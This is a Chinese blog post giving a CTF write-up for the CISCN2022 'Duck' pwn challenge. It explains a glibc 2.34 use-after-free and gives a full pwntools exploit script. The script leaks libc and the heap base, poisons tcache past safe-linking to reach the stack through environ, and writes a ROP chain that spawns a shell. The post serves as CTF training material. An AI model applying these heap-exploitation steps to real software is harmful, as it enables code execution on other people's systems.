[CISCN2022] Duck-Wp

已于 2022-07-10 09:49:40 修改
阅读量289 收藏
点赞数 2
文章标签: python
于 2022-07-10 09:45:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46329041/article/details/125702477
版权

CISCN2022 Duck Write Up

该题目附件我已经上传到Github,有需要的可以下载,复现这题时,我是使用的NSSCTF提供的远程环境。

此题是一道libc2.34的题,libc2.34与2.33最大的不同就是移除了以往常用的malloc_hook,free_hook等hook函数,导致利用上较为困难,2.34与2.33一样,chunk的fd指针都采用了异或加密,在申请chunk时便会异或解密,所以当我们改写fd指针时,只需要将泄露出的堆的基地址右移12位后与当前地址异或即可。glibc中采用的异或加密的规则并不难:将堆的基地址右移12位后与当前地址异或。

这道题逆向难度并不大,通过IDA静态分析就可以很明显的看出,在free时存在UAF,所以可以很轻松的泄露堆的基地址(用于异或加密)与libc。

先多申请几个chunk(大于8个),把最后一个留下其余的全部释放,并用0号来泄露堆的基址,将泄露的地址左移12位即可得到堆的基地址。由于chunk的大小为0x110,所以在填满tcache后,剩下的不与top chunk相邻的chunk将放入unsorted bin中,这也是前面要申请大于8个chunk的原因,然后再通过UAF泄露main arena的地址,从而泄露libc。

泄露libc之后找到environ,通过UAF改写tcache的fd指针,并将其fd指针改为environ的地址,分配出去以后,由于environ保存的是当前进程的环境变量,这里面存放了栈上的地址,泄露出environ的值后并计算出edit的地址之后,再次修改fd指针,分配到edit返回地址之后写入ROP调用链,(注意,由于是64位的程序,前六个参数通过寄存器传递,所以需要控制RDI寄存器来传入"/bin/sh\x00"作为system的参数)即可getshell。(我用one_gadget去打没有成功)

注:此处system若是无法使用,可改为execve,效果应该是一样的

最终exp如下:

from pwn import *
io=process('./pwn')
#io=remote('1.14.71.254',28045)
elf=ELF('./pwn')
libc=ELF('./libc.so.6')

context(arch='amd64', os='linux')

def add():
    io.recvuntil('Choice: ')
    io.sendline('1')

def delete(index):
    io.recvuntil('Choice: ')
    io.sendline('2')
    io.recvuntil('Idx: \n')
    io.sendline(str(index))

def show(index):
    io.recvuntil('Choice: ')
    io.sendline('3')
    io.recvuntil('Idx: \n')
    io.sendline(str(index))

def edit(index,size,content):
    io.recvuntil('Choice: ')
    io.sendline('4')
    io.recvuntil('Idx: \n')
    io.sendline(str(index))
    io.recvuntil('Size: \n')
    io.sendline(str(size))
    io.recvuntil('Content: \n')
    io.sendline(content)


for i in range(9):
    add()

for i in range(8):
    delete(i)  

show(7)

main_arena = u64(io.recvuntil(6).ljust(8, b'\x00'))
main_arena = main_arena - 96

libc_addr= main_arena-libc.sym['main_arena']

print("libc_addr: " + hex(libc_addr))
print("main_arena: " + hex(main_arena))



show(0)
heap_base=u64(io.recv(5).ljust(8,b'\x00'))
heap_base=heap_base<<12
print("heap_base: "+hex(heap_base))

for i in range(5):
    add()

environ_addr=libc_addr+libc.sym['environ']

print("environ_addr: " + hex(environ_addr))

edit(1,0x10,p64(environ_addr^(heap_base>>12))+p64(0))

add()         
add()         

show(15)
stack_addr = u64(io.recvuntil(6).ljust(8, b'\x00'))
stack_addr = stack_addr - 0x168

print("stack_addr: "+ hex(stack_addr))

delete(9)
delete(10)
edit(10,0x10,p64(stack_addr^(heap_base>>12))+p64(0))

add()  
add()  

bin_sh_addr=libc_addr+next(libc.search(b'/bin/sh'))

sys_addr = libc_addr + libc.sym['system']
pop_rdi_ret = libc_addr + next(libc.search(asm('pop rdi;ret;')))

#pop_rdi_ret=0x1703

#one_gadget=libc_addr+0xda867

payload=p64(0)*3+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(sys_addr)

#payload=p64(0)*3+p64(one_gadget)

edit(17,0x30,payload)

io.interactive()

注:题目链接我已发至我的Github中,需要的可以自行前往:https://github.com/Survive2/CISCN2022。
后续应该还会更新BigDuck以及其他的题目。

h1J4cker
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
black-duck-radar
05-23
概述这是一个chrome扩展程序,用于显示组件信息,包括操作风险,漏洞,使用的Black Duck Hub项目和违反Black Duck Hub的政策,以帮助确定是否应在项目中使用组件。建造生产: npm run build 发展: npm run dev-...
ciscn 2022 东北分区赛pwn duck
z1r0的博客
06-30 1123
很遗憾的是当时比赛解出此题花了很长时间(换了m1的mac 环境还没装,到了比赛前一会想起来x86_64的题目肯定会多一些,所以就拿了一个全新版win10的tp,第一次体验到了在比赛的时候下载ubuntu,装vm和pwn的环境,导致浪费了很多时间。。。。) 这个pwn是2.34下的,一开始拿到这个题目的时候吓了一跳(当时是第二次做2.34的glibc pwn),以为要像house of emma那样,分析下来之后感谢出题人高抬贵手。 一个uaf漏洞,但是是2.34下的,2.34下禁用了free_hook,
ciscn 2022 东北分区赛pwn bigduck
z1r0的博客
07-01 715
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
2023 ciscn 东北分区赛 pwn cgi
最新发布
z1r0的博客
07-10 478
模拟了一个http协议的交互。
[CISCN 2022 东北]听说这是一个二维码
qq_47875210的博客
12-03 687
复现过程如下: 得到密码:Sound from deep --> ,想到工具,拖到工具中,提示输入密码,密码为0和255,可以代表0或者1,所以写个代码,提取一下所有的ip,然后得到二进制字符串 运行后,得到,现在是2进制转图片了,这一步毕竟简单,实现代码如下: 运行效果: 可以看到这两个,比较像,使用在线网站:戳我打开!flag{c736863427be5671102c039d43f0c75b}
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1505
ciscn2022-线上-半决-pwn
redux-duck-immer:帮助者适应鸭子-模块化-redux提案
05-02
Redux-Duck-immer 受启发。 提供redux帮助器以实现建议。 减速器的状态由产生,以实现不变性。安装yarn add redux-duck-immer原料药定义动作类型import { defineType } from 'redux-duck-immer' ;/** * type Action...
Duck Duck-开源
05-13
Duck Duck——Gnome的开源快速应用程序启动器】 Duck Duck是一款专为Gnome桌面环境设计的开源软件,它作为一个高效的应用程序启动器,旨在为用户带来更快捷、更直观的桌面操作体验。在开源社区的支持下,Duck ...
the-duck-gallery
03-08
“ The Duck Gallery”的主要目标是提出一种简单有趣的方法,以在开源项目中做出自己的第一贡献。 这是官方网站: : 。 它向所有人开放。 哈克啤酒节快乐! 贡献 首先,要做出贡献,您必须同意我们。 然后是时候...
duck-cam
03-27
为了实现一个功能完备的"duck-cam"应用,还需要考虑其他技术,如WebRTC(用于实现浏览器间的实时通信,包括视频流),或者使用WebSockets进行实时数据传输。同时,可能还需要后端服务器来处理视频流的分发和存储,这...
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1516
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 3991
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
ciscn 2022 东北分区赛pwn blue
z1r0的博客
07-02 773
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
2022第十五届全国大学生信息安全竞赛(ciscn)西南赛区部分WP
Bnessy
07-09 3719
访问题目flag是假的,F12源代码,看到base64解码解码得到flag访问题目,有个aid.php直接访问不行,使用PHP为协议进行读取,input2需要等于Welcone!,这里要使用data协议编码一下,input3可以随便输入 exp: base64解码得到的flag.php得到flag打开题目测试发现是Smarty的模板注入上网搜索发现Smarty模板注入CVE找到一个SmartyCVE集合,https://www.cvedetails.com/vulnerability-list/ve
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2176
2022 CISCN 初赛pwn的完整wp
CISCN 2022 初赛 web 复现
shinygod的博客
11-17 1686
比赛复现
CISCN2022_login
weixin_51055545的博客
06-03 846
例行检查上来就是保护机制全开,直接到IDA中分析;逆向分析main函数:程序主逻辑在sub_FFD函数中, 要正确输入进入程序的菜单确实需要逆向好一会儿(大牛轻点儿喷),下边就是对菜单的三个函数的分析了,sub_DA8(): 这里就是很明显的一个写shellcode的地方,但存在检查机制;sub_EFE(): 将以上两个全局变量赋值为0的操作是通不过刚才的检查机制的,sub_CBD(): 这里选项1的话,就会进入到这个函数里,将unk_202028,unk_202024的值赋值为1,可以通过检查机制,思路我
PWN 更换目标程序libc
yongbaoii的博客
12-29 4728
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
PWN-无libc泄露
zszcr的博客
03-22 3676
pwn题的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数 (write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
blackduck下载安装
05-26
1. 前往Black Duck官网并注册账号:https://www.synopsys.com/software-integrity/resources/evaluations/black-duck-on-demand-trial.html 2. 登录后,选择“Black Duck On-Demand”进行试用。 3. 在“Getting ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值